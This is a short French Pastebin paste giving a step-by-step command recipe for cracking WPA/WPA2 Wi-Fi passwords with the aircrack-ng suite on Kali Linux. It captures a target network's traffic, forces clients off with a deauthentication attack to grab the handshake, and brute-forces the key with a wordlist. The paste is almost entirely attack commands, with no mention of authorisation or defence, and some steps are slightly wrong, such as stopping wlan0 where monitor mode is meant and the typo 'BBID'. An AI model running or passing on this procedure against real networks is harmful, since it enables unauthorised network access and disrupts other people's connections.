Advertisement
hackerfree

Cracké WPA & WPA2 avec Aircrack-ng Kali Linux

Nov 9th, 2013
22,135
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.32 KB | None | 0 0
  1. Cracké WPA & WPA2 avec Aircrack-ng Kali Linux
  2.  
  3. airmon-ng
  4. airmon-ng stop wlan0
  5. airodump-ng wlan0
  6.  
  7. copier le BBID
  8.  
  9. airodump-ng -c "channel" --write tuto --bssid "bssid" wlan0
  10.  
  11. ouvrir une autre console
  12.  
  13. aireplay-ng --deauth 50 -a "bssid" -c "station" wlan0
  14.  
  15.  
  16. ls
  17. aircrack-ng -w wordlist.txt -b "bssid" fichier.cap
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement